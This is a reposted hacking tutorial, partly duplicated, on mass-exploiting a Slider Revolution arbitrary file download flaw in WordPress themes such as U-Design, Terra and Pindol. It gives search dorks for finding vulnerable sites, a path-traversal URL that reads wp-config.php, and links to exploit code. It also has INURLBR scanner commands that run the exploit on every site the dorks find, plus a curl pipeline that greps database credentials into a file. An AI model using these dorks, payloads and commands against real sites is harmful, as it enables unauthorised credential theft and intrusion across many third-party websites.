Exploring Wordpress Theme Arbitrary File Download Vulnerability Exploits Available
Exploring Wordpress Theme Arbitrary File Download Vulnerability + SCANNER INURLBR / EXPLOIT INURL A.F.D Verification
Wordpress Theme U-Design Arbitrary File Download Vulnerability
DORK: inurl:"wp-content/themes/u-design/"
ACCESS: http://1337day.com/exploit/23143
Wordpress Theme Terra Arbitrary File Download Vulnerability
DORK: inurl:"wp-content/themes/terra/"
ACCESS: http://1337day.com/exploit/23142
Wordpress Theme Pindol Arbitrary File Download Vulnerability
DORK: inurl:"wp-content/themes/pindol/"
ACCESS: http://1337day.com/exploit/23144
All themes above, are failing in the same revslider plugin.
POC:
http://[target]/[path]/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
Exploit developed can check about 20 themes, and allows check standard as follows.
POC -> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
[TUTORIAL] - Hacking Panel Wordpress - Slider Revolution
[TUTORIAL] - Getting access to the Wordpress panel
Source: Inurl
Wordpress Theme U-Design Arbitrary File Download Vulnerability
DORK: inurl:"wp-content/themes/u-design/"
ACCESS: http://1337day.com/exploit/23143
-------------------------------------------------------------------------------------------
DORK: inurl:"wp-content/themes/terra/"
ACCESS: http://1337day.com/exploit/23142
-------------------------------------------------------------------------------------------
DORK: inurl:"wp-content/themes/pindol/"
ACCESS: http://1337day.com/exploit/23144
-------------------------------------------------------------------------------------------
All themes above, are failing in the same revslider plugin.
POC:
http://[target]/[path]/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
[EXPLOIT]: Wordpress A.F.D Verification/ INURL - BRASIL
Exploit developed can check about 20 themes, and allows check standard as follows.
POC -> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
Which is the same as 0day mentioned above.
[Exploit ACCESS]
http://pastebin.com/ZEnbxXXd
http://packetstormsecurity.com/files/129706/WordPress-Themes-download.php-File-Disclosure.html
Please download the exploit and put the name of exploit.php
Now let's use the inurlbr scanner as a mass explorer
[SCANNER INURLBR]
https://github.com/googleinurl/SCANNER-INURLBR
Command use INURLBR:
Ex: php inurlbr.php --dork 'you dork' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'
php inurlbr.php --dork 'inurl:"wp-content/themes/u-design/"' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'
php inurlbr.php --dork 'inurl:"wp-content/themes/terra/"' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'
php inurlbr.php --dork 'inurl:"wp-content/themes/pindol/"' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'
Brief introduction --comand
[TUTORIAL] - Wordpress A.F.D Verification/ INURL - BRASIL + SCANNER INURLBR
[Exploit ACCESS]
http://pastebin.com/ZEnbxXXd
http://packetstormsecurity.com/files/129706/WordPress-Themes-download.php-File-Disclosure.html
Please download the exploit and put the name of exploit.php
Now let's use the inurlbr scanner as a mass explorer
[SCANNER INURLBR]
https://github.com/googleinurl/SCANNER-INURLBR
Command use INURLBR:
Ex: php inurlbr.php --dork 'you dork' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'
php inurlbr.php --dork 'inurl:"wp-content/themes/u-design/"' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'
php inurlbr.php --dork 'inurl:"wp-content/themes/terra/"' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'
php inurlbr.php --dork 'inurl:"wp-content/themes/pindol/"' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'
Brief introduction --comand
--comand-vul Every vulnerable URL found will execute this command parameters.
Example: --comand-vul {command}
Usage: --comand-vul 'nmap sV -p 22,80,21 _TARGET_'
--comand-vul './exploit.sh _TARGET_ output.txt'
--comand-all Use this commmand to specify a single command to EVERY URL found.
Example: --comand-all {command}
Usage: --comand-all 'nmap sV -p 22,80,21 _TARGET_'
--comand-all './exploit.sh _TARGET_ output.txt'
Observation:
_TARGET_ will be replaced by the URL/target found, although if the user
doesn't input the get, only the domain will be executed.
_TARGETFULL_ will be replaced by the original URL / target found.
-------------------------------------------------------------------------------------------
INURLBR ADVANCED CONTROL
php inurlbr.php --dork 'YOU DORK revslider' -q 1,6 -s wordpress2.txt --exploit-get '/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php' -t 3 --exploit-comand '/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php' --comand-all 'echo "_TARGET__EXPLOIT_">> curlwordpress.txt;curl "_TARGET__EXPLOIT_"|grep "DB_" >> curlwordpress.txt;curl "_TARGET__EXPLOIT_"|grep "DB_"'
[TUTORIAL] - Wordpress A.F.D Verification/ INURL - BRASIL + SCANNER INURLBR
[TUTORIAL] - Hacking Panel Wordpress - Slider Revolution
Source: Inurl